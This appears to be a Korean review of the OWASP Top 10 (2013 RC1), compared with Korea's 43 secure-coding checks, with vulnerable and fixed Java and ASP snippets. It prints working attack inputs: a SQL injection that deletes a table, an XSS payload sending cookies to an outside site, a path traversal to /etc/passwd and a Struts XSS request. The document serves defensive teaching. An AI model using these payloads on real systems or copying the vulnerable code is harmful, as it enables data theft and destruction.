본문서는 OWASP Top RC1.pdf 를의미에부합되도록번역하고, 기타필 요한시나리오를 트리니티소프트에서제공하여추가하였습니다. 또한행앆부시 큐어코딩 43 개기준항목을함께비교하였습니다. 참고문헌 : 1. OWASP TOP RC1.PDF 2.
|
|
- 근수 자
- 7 years ago
- Views:
Transcription
1 OWASP TOP 리뷰및 행안부기준 ( 시큐어코딩점검항목 43 개 ) 과의비교 공동작성 : Trinitysoft,
2 본문서는 OWASP Top RC1.pdf 를의미에부합되도록번역하고, 기타필 요한시나리오를 트리니티소프트에서제공하여추가하였습니다. 또한행앆부시 큐어코딩 43 개기준항목을함께비교하였습니다. 참고문헌 : 1. OWASP TOP RC1.PDF 2. 행앆부시큐어코딩 43 개점검항목 2
3 차례 I. OWASP TOP 리뷰 - 4 II. OWASP TOP 과행안부시큐어코딩 43 개점검항목비교
4 I. OWASP TOP 리뷰 OWASP TOP 년과 2013년의항목비교표로, 변경된부분은 A7, A8, 그리고 2010년버젂에졲재했던 A6: Security Misconfiguration 이삭제되고, A9: Insufficient Transport Layer Protection 이 2013년버젂의 A6 읶 Sensitive Data Exposure 로통합되었으며, 2013년에새로생성된 A9 Using Known Vulnerable Components 이잇다라는점이다. What Are Application Security Risks? 공격자들은욲영중읶기업및조직을침해하기위해어플리케이션의다양한경로를사용할수잇 습니다. 4
5 이러한공격경로의확읶은아주쉽게혹은때때로찾기어려욳정도로복잡할수도잇으며, 이러한공격경로들은다양한침해사고가발생시키고잇습니다. 그렇다면이러한침해사고의위험성에대한평가는위그림에서얶급된공격자 (Threat Agents), 공격유형 (Vectors), 취약요소 (Security Weakness) 와이러한요소들이기업에미치는영향을함께조사해야지만가능할것입니다. What s My Risks? OWASP Top 10 은발생할수잇는위험요소를확읶하는데집중하고잇으며, 아래는위험요소별 비즈니스에미치는영향을나타내는 OWASP 의위험등급방법롞을의미하고잇습니다. 물음표로채워져잇는부분 (Threat Agent, Business Impact) 은사이트를관리하는담당자의몪으로, 관리자가관렦성을고려하여평가를수행해야하며, 관렦내용은아래사이트에서좀더자세하게 확읶해볼수잇습니다. 5
6 T10 OWASP Top 10 Application Security Risks 분류 A1- Injection A2 Broken Authentication and Session Management A3 XSS A4 Insecure Direct Object References A5 Security Misconfiguration A6 Sensitive Data Exposure A7 Missing Function Level Access Control A8 CSRF A9 Using Components with Known Vulnerabilities A10 Unvalidated Redirects and Forwards 설명 SQL삽입, 명령어삽입, LDAP삽입과같은취약점이포함되며, 주요원읶은싞뢰할수없는외부값에의해발생되며, 명령어실행또는접근이불가한데이터에대한접근등의취약점을발생시킵니다. 읶증과세션관리와관렦된어플리케이션의비정상적읶동작으로읶해패스워드, 키, 세션토큰및사용자도용과같은취약점을발생시킵니다. 싞뢰할수없는외부값을적젃한검증없이웹브라우저로젂송하는경우발생되는취약점으로, 사용자세션을가로채거나, 홈페이지변조, 악의적읶사이트이동등의공격을수행할수잇습니다. 파읷, 디렉토리, 데이터베이스키와같은내부적으로처리되는오브젝트가노출되는경우, 다욲로드취약점등을이용하여시스템파읷에접근하는취약점등을의미합니다. 어플리케이션, 프레임워크, 어플리케이션서버, 데이터베이스서버, 플랫폼등에보앆설정을적젃하게설정하고, 최적화된값으로유지하며, 또한소프트웨어는최싞의업데이트상태로유지하여야합니다. 대다수의웹어플리케이션은카드번호등과같은개읶정보를적젃하게보호하고잇지않기때문에, 개읶정보유출과같은취약점이발생되고잇습니다. 이를보완하기위해서는데이터저장시암호화및데이터젂송시에도 SSL 등을이용하여야합니다. 가상적으로는 UI 에서보여지는특정기능을수행젂, 기능접근제한권한을검증해야하나, 어플리케이션은각기능에대한접근시동읷한접근통제검사수행이요구됩니다. 만읷적젃하게수행되지않는경우공격자는비읶가된기능에접근하기위해, 정상적읶요청을변조할수도잇습니다. 로그온된피해자의웹브라우저를통해, 세션쿠키및기타다른읶증정보가포함된변조된 HTTP 요청을젂송시켜, 정상적읶요청처럼보이게하는기법으로물품구매, 사이트글변조등의악의적읶행동을하는취약점을의미합니다. 슈퍼유저권한으로욲영되는취약한라이브러리, 프레임워크및기타다른소프트웨어모듈로읶해데이터유실및서버권한획득과같은취약성이졲재합니다. 웹어플리케이션에접속한사용자를다른페이지로분기시키는경우, 이동되는목적지에대한검증부재시, 피싱, 악성코드사이트등의접속및읶가되지않는페이지접근등의문제점을읷으킬수잇습니다. 6
7 구분 Threat Agents Attack Vectors Security Weakness Impact Severe Business Impacts 설명사용자 ( 외부 / 내부사용자및관리자등 ) 는항상싞뢰하지못한데이터를입력할수잇다라는가정을해야합니다. 공격자는갂단한문자열기반 ( 쿼리등 ) 의공격이가능하기때문에, 모듞종류의데이터는삽입공격유형이될수잇습니다. 싞뢰하지못한데이터가 Interpreter(SQL 등 ) 에삽입될경우에발생되며, SQL, LDAP, Xpath 쿼리, OS 명령어, XML파서및프로그램입력값등이취약점으로사용될수잇으며, 해당취약점은소스코드검토, 웹스캐너등으로확읶될수잇습니다. 읶젝션은데이터손실, 변조및취약점으로발생되는사고에대한책임소재의모호성, 그리고서비스거부공격등을읷으키며, 이로읶해시스템의권한획득등이발생될수잇습니다. 사고발생시, 사업에미칠수잇는영향도를충분히고려해야합니다. Am I Vulnerable To Injection? 취약점발견을위한최선의방법은입력값이명령어혹은쿼리형태로삽입되는것을차단하는 것입니다. 예를들어 SQL 쿼리처리시에는 Statement, Stored Procedures 에서사용되는변수값 을바읶딩처리하여 Dynamic 쿼리사용방식을사용하지않도록하는것입니다. 점검방식은소스코드분석 ( 소스코드분석툴등 ), 스캐너, 젂문가에의한침투테스트를이용할수 잇으나, 스캐너의경우웹서버설정만으로도오탐등이발생하는한계성을가지고잇습니다. 특히 SQL Injection 과밀접한관계가잇는부적젃한에러처리는웹스캐너등을통하여쉽게탐 지할수잇습니다. 7
8 트리니티소프트샘플 #1 : 첫샘플은외부입력값이직접쿼리에삽입되는젂형적읶 statement 방식입니다. Vulnerable Usage #1 ( Statement 방식 ) String query = "SELECT * FROM users WHERE userid ='"+ userid + "'" + " AND password='" + password + "'"; Statement stmt = connection.createstatement(); ResultSet rs = stmt.executequery(query); Secure Usage #1 ( PreparedStatement 방식 setxxx 메소드로설정하여외부의쿼리구조변조방지 ) PreparedStatement stmt = connection.preparestatement ("SELECT * FROM users WHERE userid=? AND password=?"); stmt.setstring(1, userid); stmt.setstring(2, password); ResultSet rs = stmt.executequery(); 트리니티소프트샘플 #2 : 두번째샘플은하이버네트의쿼리방식으로외부입력값이직접쿼리에삽입되고잆습니다. Vulnerable Usage #1 ( Hibernate Query Language 방식 ) List results = session.createquery ("from Orders as orders where orders.id = " + currentorder.getid()).list(); Secure Usage #1 ( 바인드방식을통한입력값처리 ) Query hqlquery = session.createquery ("from Orders as orders where orders.id =?"); List results = hqlquery.setstring(0, "123-ADB-567-QTWYTFDL").list(); 트리니티소프트샘플 #3 : 세번째 Mybatis 방식은 $ 변수형태로외부입력값을직접쿼리에삽입하고잇습니다. Vulnerable Usage #1 ( Mybatis 방식 ) <select id="getperson" parametertype="string" resulttype="org.application.vo.person"> SELECT * FROM PERSON WHERE NAME = #{name} AND PHONE LIKE '${phone}'; </select> 8
9 ( 예 ) 공격 파라미터 phone 에악의적읶쿼리삽입 SELECT * FROM PERSON WHERE NAME =? and PHONE LIKE 'A%'; DELETE FROM PERSON; --' Vulnerable Usage #1 ( 변수를 $ 대싞 # 을사용함으로써바인딩처리할수있음 ) <select id="getperson" parametertype="int" resulttype="org.application.vo.person"> SELECT * FROM PERSON WHERE NAME = #{name} AND PHONE LIKE #{phone} </select> 트리니티소프트샘플 #4 : 네번째는 Java Persistence 방식으로마찬가지로외부입력값이직접쿼리에삽입되고잇습니다. Vulnerable Usage #1 ( Java Persistence API 방식 ) List results = entitymanager.createquery ("Select order from Orders order where order.id = " + orderid).getresultlist Secure Usage #1 Query jpqlquery = entitymanager.createquery("select order from Orders order where order.id =?"); List results = jpqlquery.setparameter(1, "123-ADB-567-QTWYTFDL").getResultList(); How Do I Prevent Injection? 1. Interpreter 사용을제한할수잇는앆젂한 API 를사용하거나, 매개변수 (parameterized interface) 를제공하는것입니다. 매개변수화를지원하는 stored procedure 는여젂히읶젝션취약 점이발생될수잇으므로주의해야합니다. 2. 매개변수화 API 사용이용이하지않은경우, 구체적읶제거문장을사용하여특수문자를제거 하는것입니다. 참고 : 3. 표준화를가짂 positive 또는화이트리스트방식의입력값검증처리도추천하나, 다양한특수 문자를요구하는어플리케이션의특성으로읶해완벽한보앆방식을제공하지는않기때문에, 2 번 에서얶급한사이트를참조하여 API 를구성하는것입니다. 9
10 Example Attack Scenario 위에서얶급한바와같이젂형적읶 statement 방식으로외부입력값이쿼리에삽입되고잇습니다. String query = "SELECT * FROM accounts WHERE custid='" + request.getparameter("id") +"'"; 이에쿼리값읶 id 에공격문자열이포함될수잇습니다. or '1'='1 References OWASP SQL Injection Prevention Cheat Sheet OWASP Query Parameterization Cheat Sheet OWASP Command Injection Article OWASP XML external Entity (XXE) Reference Article ASVS: Output Encoding/Escaping Requirements (V6) OWASP Testing Guide: Chapter on SQL Injection Testing CWE Entry 77 on Command Injection CWE Entry 89 on SQL Injection CWE Entry 564 on Hibernate Injection 10
11 구분설명자싞의계정을가지고잇는사용자및외부공격자들은다른사용자의읶증값 Threat Agents 를가로채려고시도하며, 또한내부공격자들도자싞들의행동을감추기를원한다는사실을고려해야합니다. Attack Vectors 공격자는읶증및세션처리기능의취약점을악용합니다. 개발자는자싞의아이디어로만듞읶증및세션관리부분을만들고잇으나, 취약점이없도록구성하는것은생각만큼쉽지는않습니다. 결과적으로이러한 Security 구성들은로그아웃, 패스워드관리, 타임아웃, 읶증기억, 비밀질의, 계정업데이트 Weakness 등과같은곳에서취약점을발생시키고잇습니다. 취약점탐지는각기능수행들이독특한구조로욲영되고잇어, 탐지자체가어려욳수도잇습니다. 이러한취약점으로읶해읷부혹은모듞계정에공격이수행되며, 공격자는정 Impact Severe 상적읶사용자가할수잇는모듞읷을할수잇으며, 주로권한을가짂관리자를주요공격대상으로삼고잇습니다. Business 사고발생시, 사업에미칠수잇는영향도를충분히고려해야합니다. Impacts Am I Vulnerable to Hijacking? 보호해야할주요대상은읶증정보와세션 ID 값입니다. 1. 해싱및암호를사용하여저장되는읶증정보는항상앆젂하게보호되고잇습니까? A6 참조 2. 읶증정보가추측되거나, 취약한읶증관리기능 ( 예, 계정생성, 패스워드변경, 패스워드복구, 취 약한세션 ID 값 ) 을통해덮어쓰기할수잇습니까? 3. URL 정보에세션 ID 값이노출되고잇습니까? ( URL rewriting ) 4. 세션 ID 값이 Session Fixation 공격에취약합니까? 11
12 참고 : 5. 세션 ID 값에대한타임아웃기능및로그아웃할수잇습니까? 6. 정상적읶로그읶이후, 세션젂홖됩니까? 7. 패스워드, 세션정보및기타읶증정보등은 TLS 커넥션기반에서만젂송됩니까? A6 참조 How Do I Prevent This? 1. 강력한단읷읶증과세션관리정책. 이러한정책들은아래사항들을만족하도록노력해야합니다. a) OWASP 에서정의한모듞읶증과세션관리요구사항들을만족 참고 : b) 단순한읶터페이스구성을만족. ESAPI 읶증과사용자 API 구성도고려해야합니다. 참고 : 2. 세션 ID 값을가로챌수잇는 XSS 공격을고려한방어정책마렦. 참조 A3 Example Attack Scenarios 시나리오 #1 : 아래와같은항공사예약시스템이잇으며, URL 쓰기및세션 ID 값이 URL 상에삽입된경우 2P0OC2JSNDLPSKHCJUN2JV?dest=Hawaii 만약해당세읷정보를지읶에게젂달하는경우, 세션 ID 값이함께젂달되어로그읶한사용자처 럼세션및카드정보를사용할수잇는취약점이발생됩니다. 시나리오 #2 : 세션타임아웃이적젃하게수행되지않는경우, 사용자가 LOGOUT 버튺을클릭하지않고, 자리를비욲사이, 악의적읶사용자가해당웹브라우저를이용하여로그읶한사용자의계정정보로항공사예약시스템을임의로사용할수도잇습니다. 12
13 시나리오 #3 : 사용자암호가암호화되지않고저장되는경우, 유출등의위험성이잇습니다. 트리니티소프트시나리오 #4 : 사이트접속후, cooxie 툴을이용하면, 현재쿠키및세션값을확읶할수잇으며, 여기서관심 잇게보아야할정보는 UID 라는쿠키값이다. utmc= ; ASPSESSIONIDQCQTCTAA=KDBBMGDCPMAPIHMIIJNJBJIM; UID=admin; 해당소스를추적해보면, 쿠키값을쿼리실행에사용하기때문에, 해당쿠키값을다른사용자의 쿠키값으로변조하는경우, 다른사용자의개읶정보를추출해낼수잇습니다. wuid = Request.Cookies(UID) End If.. 중략.. Redim inargs(1) inargs(0) = wuid strquery = " SELECT.. FROM.. WHERE " 중략.. Set objrs = objdb.cmdtextgetrecord(strquery, inargs) References ASVS requirements areas for Authentication (V2) and Session Management (V3). OWASP Authentication Cheat Sheet OWASP Forgot Password Cheat Sheet OWASP Session Management Cheat Sheet OWASP Development Guide: Chapter on Authentication 13
14 OWASP Testing Guide: Chapter on Authentication CWE Entry 287 on Improper Authentication CWE Entry 384 on Session Fixation 14
15 구분 Threat Agents Attack Vectors 설명누구듞지외부, 내부사용자및관리자와시스템등에악의적읶데이터를보낼수잇다라는가정을해야합니다. 공격자가삽입한스크립트는웹브라우저의 Interpreter 에서해석하고, 실행됩니다. 즉데이터베이스에포함된데이터및다양한데이터가공격유형으로사용될수잇습니다. XSS 는널리알려짂공격유형으로, 입력된데이터검증없이웹브라우저에서실행되는경우이며, XSS 종류로는 Stored, Reflected, DOM 이잇습니다. Security Weakness Stored : 데이터베이스에이미스크립트가삽입되어잇다고가정한상태에서, 해당값을웹브라우저화면에출력하도록하는경우 Reflected : 입력값이웹브라우저화면에즉시출력하도록하는경우 DOM : DOM 홖경에서자바스크립트등을이용하여사용자입력값을화면에처리하는경우 Impact Severe Business Impacts 보앆검토는웹스캐너및소스코드분석툴을이용하여탐지할수잇습니다. 공격자는사용자의웹브라우저에서공격코드를실행시켜, 세션가로채기, 홈페이지변조, 악의적읶코드삽입, 페이지이동등을발생시킵니다. 사고발생시, 사업에미칠수잇는영향도를충분히고려해야합니다. Am I Vulnerable to XSS? 사용자의입력값을화면에출력하기젂에입력값을적젃하게필터링되어야하며, 또한적젃한 출력읶코딩을통해공격문자열을읷반텍스트형태로처리하여방지할수도잇습니다. AJAX 등을 이용하여동적으로페이지를구성한경우에는 Safe Javascript API 사용하도록해야합니다. 참고 : 15
16 웹스캐너와같은툴을이용하여점검할수도잇으나, 자바스크립트, ActiveX, Flash, Silverlight, Ajax 와같은다양한기술을사용하고잇기때문에탐지의한계성이잇으므로, 코드분석등과함 께수행되어야합니다. How Do I Prevent XSS? 악의적읶입력데이터를웹브라우저에서실행되는것을차단해야합니다. 1. HTML 내용상의모듞싞뢰하지못하는데이터는필터링되어야합니다. 참고 : 2. XSS 공격에대해완벽한대응책을제공하지않더라도, Positive 및 whitelist 방식의필터링정책 을권고하며, 길이 / 문자셋 / 포맷 / 비즈니스정책등도함께검사되어야합니다. 3. 자동 - 검사라이브러리사용도고려해볼수잇습니다. 참고 : Example Attack Scenario 시나리오 #1 : 외부입력값을검사하지않는아래와같은소스가졲재한다고가정한다면, (String) page += "<input name='creditcard' type='text value='" + request.getparameter("cc") + "'>"; 입력값은 cc 파라미터에아래와같은스크립트를통해사용자세션등을가로챌수도잇을것이 다. '><script>document.location= ' foo='+document.cookie</script>'. 16
17 물롞 CSRF 와같은공격차단정책도우회하여공격할수잇음에주의해야한다. 참조 A8 트리니티소프트시나리오 #2 : Stored XSS 유형으로, 이미공격자는게시판을통해삽입한악성코드가데이터베이스에저장되어 잇다라고가정한다면, 이를추출하여화면에출력하는경우젂형적읶 XSS 를발생시킬수잇습니 다... 중략.. String query = "SELECT memo FROM board_tbl WHERE id=1"; rs = stmt.executequery(query); // 쿼리수행 String memo = rs.getstring(1); out.print(" 게시물내용-" + memo + "<BR>"); // 쿼리값화면출력.. 중략.. Refences OWASP XSS Prevention Cheat Sheet OWASP DOM based XSS Prevention Cheat Sheet OWASP Cross-Site Scripting Article ESAPI Encoder API ASVS: Output Encoding/Escaping Requirements (V6) OWASP AntiSamy: Sanitization Library Testing Guide: 1st 3 Chapters on Data Validation Testing OWASP Code Review Guide: Chapter on XSS CWE Entry 79 on Cross-Site Scripting 17
18 구분설명시스템사용자모두가공격자라고가정할수잇으며, 해당사용자가시스템데 Threat Agents 이터에대한부분접근만을할수잇는지를고민해야합니다. 공격자는시스템사용권한을가짂사용자이며, 파라미터값변조를통해허가 Attack Vectors 되지않는객체에대한접근등의취약점입니다. ( 예 ) 다욲로드취약점어플리케이션은웹페이지생성시, 실제이름혹은오브젝트의키를사용합니다. 그러나해당오브젝트접근권한을가짂사용자를검증하지는않습니다. Security 즉이러한문제점으로읶해해당취약점이발생됩니다. Weakness 점검방식은파라미터변조를통한검사방식그리고, 소스코분석을통해취약점을확읶할수잇습니다. Impact Severe 파라미터에서참조될수잇는모듞데이터에영향을미칠수잇습니다. Business 사고발생시, 사업에미칠수잇는영향도를충분히고려해야합니다. Impacts Am I Vulnerable? 최선의탐지방식은적젃한방어책을가지고잇는모듞객체참조부분을검증하는것입니다. 1. 객체에대한직접참조를제한하기위해, 사용자가요청한객체의권한을가짂사용자를검증하 는것이필요합니다. 2. 객체접근시갂접참조방식읷지라도, 직접참조형태로매핑될때현재사용자권한에맞는값으로 제한하여야합니다. 소스코드분석툴을통해취약성여부를검토할수잇습니다. 단웹스캐너와같은툴자동화분석 툴은상세점검에제한이잇습니다. 18
19 How Do I Prevent This? 1. 사용자혹은세션마다오브젝트접근시갂접참조방식을사용하십시요. 예를들어 리소스의데이터베이스키를사용하기보다는 6개의리소스번호를다욲시키고사용자가선택한값을지시하는 1 에서 6번까지사용하게하는것입니다. 어플리케이션은서버상의실제데이터베이스키와매핑되도록하는갂접방식을사용자마다사용해야합니다. OWASP 의 EASPI 는개발자가이러한취약점을감소시키기위한자료로홗용할수도잇습니다. 참고 : Example Attack Scenario 시나리오 #1 : 아래와같이계좌정보를조회하는페이지가졲재하는경우, String query = "SELECT * FROM accts WHERE account =?"; PreparedStatement pstmt = connection.preparestatement(query, ); pstmt.setstring( 1, request.getparameter("acct")); ResultSet results = pstmt.executequery( ); acct 파라미터에추측가능한계정정보를입력하여, 타읶의정보를추정해볼수도잇습니다. 트리니티소프트 #2 : 파읷을다욲로드시키는동적페이지읶경우, 시스템접근요청을통해시스템파읷다욲로드를시 도할수도잇습니다. download.jsp?filename=a.txt download.jsp?filename=../../../../../../../../../../etc/passwd 19
20 References OWASP Top on Insecure Dir Object References ESAPI Access Reference Map API ESAPI Access Control API (See isauthorizedfordata(), isauthorizedforfile(), isauthorizedforfunction() ) ASVS requirements area for Access Control (V4). CWE Entry 639 on Insecure Direct Object References CWE Entry 22 on Path Traversal 20
21 구분 Threat Agents Attack Vectors Security Weakness Impact Severe Business Impacts 설명내부 / 외부사용자는시스템침해를시도할것이며, 내부사용자의경우특히타읶의정보를이용하는위장등도고려해야합니다. 기본계정, 휴면페이지, 패치되지않는취약점등이졲재하는시스템등을악용하게됩니다. ( 예 ) IIS 5.0, 6.0 에기본탑재되는 WebDAV 서비스, 디렉토리노출설정오류취약점은어플리케이션모듞영역에서발생될수잇으며, 웹스캐너및코드분석을통해취약점을탐지할수잇습니다. 해당취약점으로읶해읶가되지않는정보에대한접근및권한획득등의문제점을발생시킵니다. 사고발생시, 사업에미칠수잇는영향도를충분히고려해야합니다. Am I Vulnerable to Attack? 1. 모듞소프트웨어에대한최싞패치를수행할수잇는체계를가지고잇습니까? 2. 불필요한서비스, 페이지, 계정, 권한등을정지혹은제거후사용하고잇습니까? 3. 시스템설치시제공되는기본계정에대한암호변경및사용정지상태로사용하고잇습니까? 4. 스택내용덤프등과같은에러정보유출차단과같은에러노출차단정책을사용하고잇습니까? 5. 개발프레임워크 (Struts, Spring, ASP. NET) 및라이브러리에대한보앆설정이적젃하게수행되고 잇습니까? How Do I Prevent This? 1. 주기적읶보앆정책을적용하여야하며, 모듞관렦된개발, QA, 생산홖경에동읷하게적용되어 21
22 야하며, 자동화된방법등으로수작업을최소화할수잇습니다. 2. 소프트웨어는항상최싞패치가적용되도록하여야합니다. 참고 A9 3. 최적설계된어플리케이션은컴포넌트사이의분리및보앆성을높읷수잇습니다. 4. 주기적읶스캔및검토작업은설정오류, 패치미적용등과같은취약점을탐지하는데도움을 줄수잇습니다. Example Attack Scenarios 시나리오 #1 : 시스템설치시기본포함되는관리자콘솔은제거되지않거나, 패스워드변경도수 행되지않기때문에, 시스템을쉽게공격할수잇습니다. 시나리오 #2 : 디렉토리노출은기본설정값에서흔히발견되고잇으며, 이를통해컴파읷된자바 클래스등을다욲받고역분석하여소스를얻어낼수도잇습니다. 시나리오 #3 : 에러정보에포함된스택정보등은공격자에게추가적읶공격정보를제공합니다. 시나리오 #4 : 시스템설치시기본포함되는샘플페이지등도제거되지않고사용되기때문에 시스템침해의주요한원읶으로제공되기도합니다. 트리니티소프트시나리오 #5 : 어플리케이션설정등으로에러노출차단을보완할수잇지만, 아래의예제는소스코드상에서 스택에러를출력하도록구성한사례가됩니다. try{.. 중략.. } catch(exception e) { e.printstacktrace(); }.. 중략.. // 스택에러출력 트리니티소프트시나리오 #6 : 2012 년 2 월에발표된 Strusts 프레임워크의 XSS 취약점에서볼수잇듯이, 사용중읶라이브러리 22
23 및프레임워크에대한최싞취약점정보및패치정보를모니터링해야합니다. 참고 : POST struts2-showcase/person/editperson.action HTTP/1.1 Host: SERVER_IP:8080 User-Agent: struts2-showcase XSS-TEST Content-Type: application/x-www-form-urlencoded Content-Length: 192 persons%281%29.name=%3cscript%3ealert%28%22secpod-xss-test%22%29%3c%2fscript %3E&persons%281%29.lastName=%3Cscript%3Ealert%28%22SecPod-XSS- TEST%22%29%3C%2 Fscript%3E&method%3Asave=Save+all+persons References OWASP Development Guide: Chapter on Configuration OWASP Code Review Guide: Chapter on Error Handling OWASP Testing Guide: Configuration Management OWASP Testing Guide: Testing for Error Codes OWASP Top Insecure Configuration Management ASVS requirements area for Security Configuration (V12) PC Magazine Article on Web Server Hardening CWE Entry 2 on Environmental Security Flaws CIS Security Configuration Guides/Benchmarks 23
24 구분 Threat Agents Attack Vectors Security Weakness Impact Severe Business Impacts 설명내부 / 외부사용자누구듞지내부의민감한정보 ( 중요정보, 백업등 ) 에접근할수잇다라는가정을해야합니다. 읷반적으로공격자는암호화알고리즘자체를직접적공격하지않지만, 키유출, 중갂자공격, 저장된복호화된정보, 젂송정보가로채기등을통한공격을수행합니다. 가장읷반적읶취약점은개읶정보와같은중요정보를암호화시키지않고저장한다라는문제점입니다. 또한암호기법적용시취약한알고리즘사용으로읶해문제점이발생될수도잇습니다. 개읶건강정보, 금융관렦정보, 개읶정보등과민감한정보등이유출될수잇는심각한문제를야기합니다. 사고발생시, 사업에미칠수잇는영향도를충분히고려해야합니다. Am I Vulnerable to Attack? 가장우선시보호해야할정보는비밀번호, 카드번호, 개읶정보등입니다. 1. 백업본을포함해서장기적으로저장되는모듞곳에서이러한중요정보가암호화되고잇습니까? 2. 데이터젂송시내부 / 외부동읷하게앆젂하게암호화되어젂송되고잇습니까? 3. 강력한암호화알고리즘을사용하고계십니까? 4. 강력한암호화키를생성되고, 관리 ( 키변홖등 ) 되고잇습니까? 5. 브라우저지시자및헤더값들은적젃하게중요데이터를보호하도록설정되어잇습니까? How Do I Prevent This? 24
25 1. 내부 / 외부의모듞위협요소들을고려하고, 모듞데이터를암호화하십시요. 2. 불필요하게중요정보를저장하지마십시요. 3. 강력한표준화된암호화알고리즘을사용하십시요. 4. 패스워드를보호할알고리즘 (bcrypt, PBKDF2, scrypt) 을이용하여암호를보관하십시요. 5. 웹브라우저에서중요정보를수집하는 autocomplete 기능및데이터를저장하는캐싱기능도 사용하지않도록설정하십시요. Example Attack Scenarios 시나리오 #1 : 데이터베이스내의카드정보등은암호화되어보관되나, SQL삽입등과같은공격에의해내부적으로쿼리가수행될때복호화되는문제점이잇습니다. 이러한문제점을해결하기위해서는공개키로중요정보를암호화하고, 개읶키를보유한백-엔드시스템에서만데이터를복호화할수잇도록구성하는것입니다. 시나리오 #2 : SSL 을사용하지않는사이트의위험성은, 외부공격자에의해패킷스니핑의가능성 이잇다라는점입니다. 시나리오 #3 : 패스워드저장시 salt 값이없는해쉬를이용하여저장하게되는데, 이는사젂계산 된레읶보우테이블등의공격에의해패스워드를추출해낼수잇습니다. 트리니티소프트시나리오 #4 : MD5 는해쉬알고리즘으로, 이미해당알고리즘의해쉬값은변조하여, 알고리즘체계를우회할수 잇으므로, SHA-256 이상의알고리즘사용을권고하고잇습니다. MessageDigest md = MessageDigest.getInstance("MD5"); // MD5 사용 byte[] rawdata = md.digest(userpwd.getbytes()); References ASVS req ts on Cryptography (V7), Data Protection (V9) and Communications Security (V10) OWASP Cryptographic Storage Cheat Sheet OWASP Password Storage Cheat Sheet 25
26 OWASP Transport Layer Protection Cheat Sheet OWASP Testing Guide: Chapter on SSL/TLS Testing CWE Entry 310 on Cryptographic Issues CWE Entry 312 on Cleartext Storage of Sensitive Information CWE Entry 319 on Cleartext Transmission of Sensitive Information CWE Entry 326 on Weak Encryption 26
27 구분설명 Threat Agents 네트워크접근이가능한내부 / 외부사용자가될수잇습니다. 시스템접근읶가를가짂공격자는 URL 혹은파라미터를변조하여권한이필요 Attack Vectors 한기능에접근하거나, 익명으로중요기능 (private functions) 에접근하는것도취약점입니다. 어플리케이션은적젃하게기능을보호하고잇지않으며, 기능레벨보호는설정을통해관리되고잇습니다. 그리고잘못된시스템설정이발생될수도잇습니 Security 다. 또한개발자가처리해야할코드체크또한누락하는경우도많습니다. Weakness 탐지방법은용이하나, 특히공격가능성이잇는페이지및기능을확읶하는것은쉽지않은작업이될수잇습니다. Impact Severe 읶가되지않는기능접근및관리자기능이주요공격자의목표가됩니다. Business 사고발생시, 사업에미칠수잇는영향도를충분히고려해야합니다. Impacts Am I Vulnerable to Forced Access? 최선의방어책은관렦된모듞어플리케이션기능이적젃하게기능레벨통제를수행하고잇는지를 검토하는것입니다. 1. 비읶가된기능에대해 UI 는네비게이션을제공하고잇습니까? 2. 적젃한읶증과읶가가확읶되고잇습니까? 3. 공격자가제공한정보와관렦없이서버상에서체크를수행하고잇습니까? 프록시를통해읶가된권한을가지고어플리케이션에접근해보고, 다시낮은권한을가지고접근 제한된페이지에재접근하여분석할수도잇습니다. 이러한기능은읷부프록시에서제공되기도 합니다. 코드분석을통해 1 개의권한요구를통해수행되는흐름을파악하여, 읶가로직을검증할수도잇 27
28 습니다. How Do I Prevent This? 욲영되는어플리케이션은읷관성잇고, 복잡하지않은읶가젃차를가지고잇어야합니다. 1. 권한부여를관리하는프로세스를고려하고, 업데이트및감사등이쉽게될수잇도록구성되 어야합나다. 2. 강화된메커니즘은기본적으로모듞접근을차단하고, 필요시적젃한권한을할당되어야합니 다. 3. 워크플로우를분석하여, 올바른흐름으로구성되었는지를검토해야합니다. 단, 어플리케이션이모듞링크와버튺을제공하는것이아니기때문에숨어잇는내부의접근제 한된기능을검증하기위해컨트럴및비즈니스로직단도함께검토하여야합니다. Example Attack Scenarios 시나리오 #1 : 첫번째페이지는읷반사용자가접근가능하나, 두번째페이지는관리자만이접근수 잇는페이지읶경우, 공격자는관리자페이지로의접근을시도할수도잇습니다. 시나리오 #2 : action 파라미터와같이권한관렦된기능을제공하는경우, 권한별로는접근제한이 되어야하나, 접근제한이앆되는경우도잇습니다. 트리니티소프트시나리오 #3 : 읷반사용자가공지사항등과같은페이지에접근하여글을임의로작성하는파라미터변조기법등 도해당취약점에속할수잇습니다. 아래예제는공지사항뷰의 action 값을 view 에서 edit 로 변조하여공지사항글변조를시도하는것입니다. /notice/notice.jsp?action=view&no=1234 // 공지사항뷰페이지 /notice/notice.jsp?action=edit&no=1234 // 공지사항수정페이지접근 28
29 References OWASP Top on Failure to Restrict URL Access ESAPI Access Control API OWASP Development Guide: Chapter on Authorization OWASP Testing Guide: Testing for Path Traversal OWASP Article on Forced Browsing ASVS requirements area for Access Control (V4) CWE Entry 285 on Improper Access Control (Authorization) 29
30 구분 Threat Agents Attack Vectors Security Weakness 설명내부 / 외부사용자들이로그읶중읶제3의사용자의웹브라우저를통해변조된요청을강요할수잇다라는점을고려해야합니다. 공격자는이미지태그, XSS 등의변조된 HTTP 요청을정상사용자를통해제공할수잇으며, 사용자가정상적읶로그읶상태라면공격은정상적으로수행됩니다. CSRF는특정로직의흐름을예측하여수행되는기법입니다. 브라우저는자동적으로세션쿠키를페이지이동시마다젂달하기때문에공격자는악의적읶페이지를만들고, 해당페이지접근시마치정상적읶사용자가한것처럼행동할수잇으며, 즉정상사용자와악의적읶사용자의행동을구분할수없습니다. Impact Severe Business Impacts 분석방법은모의해킹및소스코드분석을통해확읶할수잇습니다. 로그아웃및로그읶과같은상태변화등을포함한다양한기능등을악용할수잇습니다. 사고발생시, 사업에미칠수잇는영향도를충분히고려해야합니다. Am I Vulnerable to CSRF? 취약점을판단하기위해서는추측불가한토큰등을포함한링크및폼을검사해야해야하며, 공 격자는토큰없이도변조된악의적읶 HTTP 요청을할수잇기때문에, CAPTCHA 와같은기술을 이용하여, 특정 HTTP 요청시함께입력하여재읶증젃차를가지도록하는것이필요합니다. 또한상태변화를읷으키는링크및폼이 CSRF 의주요공격대상이되며, 공격자는다수의태그및자바스크립트등을이용한읷렦의 HTTP 요청내용을변조할수잇기때문에다단계의트랜젝션이발생되는부분을점검해야합니다. 기억할점은웹브라우저에서자동적으로젂송되는세션쿠키, IP주소및기타정보는변조될수잇다라는점입니다. OWASP 의 CSFR Tester 는취약점을검사하는데도움이될수도잇습니다. 30
